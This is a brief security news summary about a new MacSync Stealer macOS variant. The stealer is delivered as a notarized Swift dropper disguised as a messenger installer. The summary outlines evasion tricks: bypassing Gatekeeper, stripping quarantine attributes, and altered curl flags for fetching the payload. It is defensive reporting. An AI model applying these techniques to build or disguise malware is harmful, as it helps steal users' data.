"Unlike earlier MacSync Stealer variants that primarily rely on drag-to-terminal or ClickFix-style techniques, this sample adopts a more deceptive, hands-off approach, Jamf researcher Thijs Xhaflaire said."
"Notably, the curl command used to retrieve the payload shows clear deviations from earlier variants, Xhaflaire explained."
"Rather than using the commonly seen -fsSL combination, the flags have been split into -fL and -sS, and additional options like --noproxy have been introduced."
"These changes, along with the use of dynamically populated variables, point to a deliberate shift in how the payload is fetched and validated, likely aimed at improving reliability or evading detection."
A new MacSync information stealer variant is distributed as a code-signed, notarized Swift application inside a disk image named zk-call-messenger-installer-3.9.2-lts.dmg hosted on zkcall[.]net/download. The signing and notarization allow the installer to run without Gatekeeper or XProtect blocking, while on-screen instructions prompt users to right-click and open the app to further bypass protections. Apple revoked the signing certificate. The Swift dropper verifies internet connectivity, enforces a roughly 3,600-second execution interval, removes quarantine attributes, validates files, and downloads an encoded script through a helper. The payload fetch uses altered curl flags (-fL and -sS, --noproxy) and dynamic variables to improve reliability or evade detection.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]